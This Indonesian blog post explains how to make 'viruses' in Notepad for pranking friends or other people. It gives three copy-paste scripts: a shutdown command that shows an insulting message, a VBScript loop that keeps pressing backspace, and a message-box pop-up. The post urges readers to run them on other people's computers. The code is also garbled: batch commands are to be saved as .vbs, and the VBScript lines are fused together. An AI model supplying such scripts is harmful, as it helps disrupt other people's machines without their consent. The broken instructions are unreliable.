Cara Membuat Virus Dengan Notepad Sendiri

Cara membuat virus dengan notepad itu adalah hal yang mudah sekali untuk dicoba dipraktekkan di rumah masing – masing. Tips ini tidak memandang kalian pemula atau yang sudah expert sekali pun. Karena disini akan membahas secara gampangannya saja. Berikut penjelasan lengkap yang terperinci dalam artikel dibawah ini dengan topik cara aman untuk membuat virus jahat melalui aplikasi notepad.

Cara Membuat Virus Dengan Notepad


Tips Membuat Virus Yang Mudah Ala Notepad


Bagi anda yang merupakan seorang programmer awal atau pemula, wajib sekali untuk membaca penjelasan dari cara membuat virus dengan notepad yang luar biasa dibawah ini agar kalian bisa menjahili teman anda atau orang lain.

1. Virus Mudah Untuk Membuat Komputer Shutdown

Asik bukan kalau anda bisa membuat virus usil yang mematikan, seakan – akan anda telah menjadi programmer handal. Padahal caranya terbilang simpel banget, tanpa harus kursus atau belajar sampai berbulan – bulan untuk sekedar hal ini. Dengan menggunakan aplikasi bawaan dari komputer yakni aplikasi notepad anda bisa kok membikin satu virus untuk mematikan komputer secara langsung. Kalau berminat silahkan copy paste script dibawah ini agar jelas : 

@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s\

Setelah itu simpan di notepad dengan ekstensi file bernama vbs, contohnya anda memberikan nama virus shutdown maka bagian akhirnya menjadi virus shutdown.vbs, mudah bukan?

2. Virus Mudah Untuk Membuat Tombol Backspace Komputer Error

Tips usil kedua dari cara membuat virus dengan notepad adalah membuat trik usil yang paling bisa membuat anda kesal dengan merusakkan kegunaan tombol backspace pada komputer atau pun laptop anda. Efeknya, backspacenya akan terpakai secara sendirinya dan tidak akan berhenti sebelum anda memakai software bantuannya atau menghentikannya langsung. Ketikkan saja atau copy paste script berikut ke notepad anda dengan ekstensi file berupa .vbs, sama seperti yang ada di nomor 1 tadi.

MsgBox "kembali ke menu sebelumnya"Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "{bs}"loop

Cukup segitu saja script yang nomor 2 ini, jangan lupa disimpan untuk all files sehingga dapat terbaca oleh aplikasi apapun.

3. Virus Mudah Untuk Membuat Pesan Spam

Nah cara membuat virus dengan notepad yang terakhir ini lah yang mulai menyenangkan dan terlihat begitu mengasikkan untuk mengerjai teman – teman anda. Membuat virus ringan yang dapat mengirim pesan terus menerus kepada teman anda sehingga bisa dikatakan sebagai spam. Caranya simpel kok, tinggal copy paste script berikut ini : 

MsgBox "Pesan Anda"

Pada bagian pesan silahkan ketikkan pesan sesuka selera anda dalam mengusili teman anda itu tadi. Setelah yakin, klik save dengan file ekstensinya berupa vbs.


Demikian saja lah informasi penting dari pada 3 cara membuat virus dengan notepad yang mengasikkan. Semoga kalian dapat menggunakan artikel tersebut sebaik mungkin dan dapat menambah wawasan kalian yang menakjubkan tersebut.